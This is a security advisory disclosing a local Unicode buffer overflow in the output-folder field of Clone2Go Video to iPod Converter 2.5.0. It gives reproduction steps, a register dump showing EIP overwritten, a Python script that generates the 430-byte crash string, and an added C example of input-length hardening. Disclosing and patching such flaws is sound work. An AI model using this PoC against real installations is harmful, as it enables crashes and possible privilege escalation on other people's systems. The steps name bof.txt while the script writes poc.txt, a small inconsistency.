Clone2Go Video to iPod Converter 2.5.0 – Unicode Buffer Overflow Vulnerability

A classic local Unicode buffer overflow vulnerability has been discovered in the official Clone2Go Video to iPod Converter v2.5.0 software. Exploiting it allows local attackers to gain higher system or access privileges.

Local attackers with a low-privilege system user account or restricted system privileges are able to compromise the local system by exploiting the vulnerability. The local attacker copies a string of a specific byte size into the options index files input to overflow the process and overwrite registers such as ECX, EBX or EIP. This allows the local attacker to take over the system process of the software client and compromise the local system/server.

Vulnerable Module(s):
[+] Menu > Edit > Options > Set Output folder (Input)

Product & Service Introduction:
===============================

Video to iPod Converter is a powerful and easy-to-use iPod video conversion software tool for Apple iPod fans. With this video converter for iPod, you can convert videos in almost any popular video format, including AVI, WMV, ASF, MOV, MP4, RM, RMVB, FLV, MKV, AVS, MPG, VOB for playback on the new iPod touch, iPod classic, iPod nano 5G with camera.

(Copy of the Vendor Homepage: http://www.clone2go.com/)

Date of Discovery:
==================

2018-09-11

Exploitation Technique:
=======================

Local

Platform Tested:
===============

Windows 7

Solution – Fix & Patch:
=======================

Restrict the size of the Set Output folder input and allocate the memory accordingly, so that interaction with the vulnerable input field cannot overflow the process.
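The size restriction recommended above, as an added example in C (not Clone2Go's code and not part of the original advisory): a hypothetical `set_output_folder` measures the UTF-16 input against an assumed 260-unit buffer before copying, and `units_as_dword` shows why the widened `A` characters read as `00410041` in the proof-of-concept register dump. All function names, the `options_t` record and the buffer size are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Assumed limit: Windows MAX_PATH, 260 UTF-16 units including the NUL. */
#define OUT_DIR_MAX 260
/* Hypothetical options record with a fixed-size UTF-16 folder buffer. */
typedef struct { uint16_t out_dir[OUT_DIR_MAX]; } options_t;

/* Length in UTF-16 units, scanning at most cap units; cap means "no NUL seen". */
static size_t u16_nlen(const uint16_t *s, size_t cap) {
    size_t n = 0;
    while (n < cap && s[n] != 0) n++;
    return n;
}

/* Hardened setter: measure first, copy only if input plus NUL fits.
 * Returns 0 on success, -1 on NULL or oversize input (buffer left untouched). */
int set_output_folder(options_t *opt, const uint16_t *input) {
    if (opt == NULL || input == NULL) return -1;
    size_t len = u16_nlen(input, OUT_DIR_MAX);
    if (len >= OUT_DIR_MAX) return -1;
    memcpy(opt->out_dir, input, len * sizeof(uint16_t));
    opt->out_dir[len] = 0;
    return 0;
}

/* Widen ASCII to UTF-16 the way a Unicode text field does: 0x41 -> 0x0041. */
size_t widen_ascii(const char *src, uint16_t *dst, size_t dst_units) {
    size_t i = 0;
    if (dst_units == 0) return 0;
    for (; src[i] != '\0' && i + 1 < dst_units; i++)
        dst[i] = (uint16_t)(unsigned char)src[i];
    dst[i] = 0;
    return i;
}

/* Two adjacent UTF-16LE units read as one little-endian 32-bit value. */
uint32_t units_as_dword(const uint16_t *u) {
    return (uint32_t)u[0] | ((uint32_t)u[1] << 16);
}

int main(void) {
    char a[431]; uint16_t wide[512]; options_t opt = {{0}};
    memset(a, 'A', 430); a[430] = '\0';   /* constructed input, sized as in the PoC */
    widen_ascii(a, wide, 512);
    printf("%08X %d\n", (unsigned)units_as_dword(wide), set_output_folder(&opt, wide));
    return 0;
}
```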

Levels Risk :

Proof of Concept (PoC):
=======================

The local buffer overflow vulnerability can be exploited by local attackers with a restricted system user account and without user interaction. To reproduce the issue for a security demonstration, follow the information and steps provided below.

Manual steps to reproduce the vulnerability ...
1. Install the software and start the client
2. Copy the AAAA... string from bof.txt to the clipboard
3. Run VideoConverter.exe
4. Go to Menu > Edit > Options > Set Output folder (Input)
5. Paste the AAAA... string into the input and click Open
6. A message box opens; click OK
7. The software will crash reliably or shut down
8. Successful reproduction of the local buffer overflow vulnerability!

--- Registers ---
EAX 8B368BC6
ECX 00410041 VideoCon.00410041 <--- Overwrite
EDX 76F16CCD ntdll.76F16CCD
EBX 00410041 VideoCon.00410041 <--- Overwrite
ESP 00123600
EBP 00123628
ESI 8B368BC6
EDI 00000000
EIP 00410041 VideoCon.00410041 <--- Overwrite

--- Code Python ---
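#!/usr/bin/python
# Writes a 430-character string of "A" (0x41) to poc.txt.

buffer = "\x41" * 430  # 430 x 'A'

poc = buffer
# The context manager closes the file even if the write fails
with open("poc.txt", "w") as f:
    f.write(poc)

print("POC Created by ZwX")
print(" Email: msk4@live.fr")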

References:
===========

[#] cxsecurity.com
